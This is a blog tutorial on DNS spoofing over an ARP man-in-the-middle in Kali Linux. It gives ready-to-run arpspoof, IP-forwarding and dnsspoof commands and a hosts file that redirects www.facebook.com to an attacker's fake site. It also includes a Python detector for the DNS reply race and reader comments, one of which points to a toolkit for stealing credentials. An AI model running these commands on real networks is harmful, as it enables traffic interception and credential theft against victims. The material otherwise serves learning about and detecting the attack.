Sunday, 10 May 2015

Fake Website with DNS Spoofing in Kali Linux


DNS spoofing is based on presenting fake DNS replies to a victim in response to their DNS requests and, as a result, forcing them to visit a fake website.

In normal DNS communication, the client requests the IP address of a particular website and the DNS server responds with the IP address of that website. The client then connects to the website through the IP address it received. With DNS spoofing, the attacker intercepts the DNS request and sends a response containing a spoofed IP address before the reply from the real DNS server can reach the client. Because the client accepts the first reply that matches its query, the spoofed reply only has to win the race.

Consider the following scenario:

Gateway:  192.168.122.1
Victim:   192.168.122.3
Attacker: 192.168.122.10

There is a LAN connected to the Internet through a router, 'Gateway'. A machine 'Victim' on the LAN accesses the Internet. Another machine on the LAN, 'Attacker', launches a man-in-the-middle attack (an ARP spoofing attack) against 'Victim' and 'Gateway', so that all communication between 'Victim' and 'Gateway' passes through 'Attacker'. For a detailed explanation of ARP spoofing, refer to this post.


How will the Attacker do this?

'Attacker' sends 'Victim' false ARP replies claiming that it is 'Gateway', and sends 'Gateway' false ARP replies claiming that it is 'Victim'.
When 'Victim' requests the IP address of 'www.facebook.com', 'Attacker' intercepts the request and answers the DNS query (before the genuine response arrives) with the spoofed address '192.168.122.10' (the IP address of the Attacker). 'Victim' then makes a connection request to 192.168.122.10 and ends up visiting a fake website hosted on the 'Attacker' machine.


Perform the following steps on the 'Attacker' (Kali Linux) machine:

1) Configure ARP spoofing
  1.1) Tell the 'victim' that we are 'gateway'. Open a terminal window and type the following command:
     arpspoof -i eth0 -t victimIP gatewayIP

  1.2) Tell the 'gateway' that we are 'victim'. Open a terminal window and type the following command:
     arpspoof -i eth0 -t gatewayIP victimIP

  1.3) Enable IP forwarding in the kernel. Open a terminal window and type the following command:
     sysctl -w net.ipv4.ip_forward=1

  1.4) Ensure that forwarding is enabled in the firewall (on Kali, check the iptables FORWARD chain), and verify that the firewall does not block any incoming or outgoing packets.


2) Configure DNS spoofing
  2.1) Create a file 'hosts.spoof' containing the name of the website and the spoofed IP address:
     192.168.122.10           www.facebook.com

  2.2) Open a terminal window and run the following command:
     dnsspoof -i eth0 -f hosts.spoof

Now, whenever 'Attacker' intercepts a DNS request for 'www.facebook.com', it sends a fake DNS reply containing its own IP address, and the 'Victim's' browser is directed to the fake website hosted on the 'Attacker' machine. Note that for a site served over HTTPS the browser will warn that the fake site's certificate does not match, and for an HSTS-protected domain it will refuse to load the page at all; on the network side, the tell-tale sign is two DNS replies for the same query arriving with different answers, the spoofed one first.
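As an added example (not part of the original post), a small passive detector for the reply race described above, run over a constructed sample of DNS replies as a monitor on the LAN would log them. The timestamps, transaction ids, MAC addresses and the public answer IPs are made up for illustration; the 192.168.122.0/24 LAN and the 192.168.122.10 address come from the scenario.

```python
import ipaddress
from collections import defaultdict

# Constructed sample of DNS replies (timestamp in seconds, DNS transaction id,
# queried name, answer IP, source MAC of the frame). The first pair mirrors the
# scenario above: a reply pointing at 192.168.122.10 arrives, then the genuine
# reply forwarded from the gateway arrives 18 ms later with the real address.
SAMPLE_REPLIES = [
    (0.000, 0x1A2B, "www.facebook.com", "192.168.122.10", "52:54:00:00:00:0a"),
    (0.018, 0x1A2B, "www.facebook.com", "157.240.1.35", "52:54:00:00:00:01"),
    (1.200, 0x3C4D, "www.example.com", "93.184.216.34", "52:54:00:00:00:01"),
    (2.500, 0x5E6F, "www.facebook.com", "192.168.122.10", "52:54:00:00:00:0a"),
    (2.521, 0x5E6F, "www.facebook.com", "157.240.1.35", "52:54:00:00:00:01"),
]

LOCAL_NET = ipaddress.ip_network("192.168.122.0/24")  # the LAN from the scenario


def find_spoofed_replies(replies, window=1.0, local_net=LOCAL_NET):
    """Return alerts as (reason, txid, qname, detail) tuples.

    Check 1 (strong): two replies for the same (txid, name) carrying different
    answers within `window` seconds, i.e. the race a spoofer creates.
    Check 2 (weak heuristic): an answer that lies inside the local LAN, which is
    exactly what the hosts.spoof entry above produces. Split-horizon DNS can
    legitimately do this too, so treat it as a signal to correlate, not proof.
    """
    seen = defaultdict(list)  # (txid, qname) -> [(ts, ip, mac), ...]
    alerts = []
    for ts, txid, qname, ip, mac in replies:
        key = (txid, qname)
        for prev_ts, prev_ip, prev_mac in seen[key]:
            if prev_ip != ip and ts - prev_ts <= window:
                alerts.append(("conflicting-replies", txid, qname,
                               f"{prev_ip} ({prev_mac}) then {ip} ({mac})"))
        if ipaddress.ip_address(ip) in local_net:
            alerts.append(("answer-in-local-lan", txid, qname, ip))
        seen[key].append((ts, ip, mac))
    return alerts


if __name__ == "__main__":
    for reason, txid, qname, detail in find_spoofed_replies(SAMPLE_REPLIES):
        print(f"{reason}: txid=0x{txid:04x} {qname} -> {detail}")
```

A real deployment would feed this from a packet capture of UDP port 53 on a mirror port and would also watch for the ARP half of the attack: the gateway's IP suddenly answering from a different MAC.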

5 comments:

  1. How would you get the credentials once you've set this up?
    Thanks

    1. If you're using kali you can set up a fake website that will steal credentials in the social engineering toolkit

  2. Hello

    How can this work in a WAN network?

    Thanks

  3. I have been trying this for a few days with lots of research. The victim is not being redirected. Any thoughts?

  4. Look up, it's complicated dude, I am having the same issue.
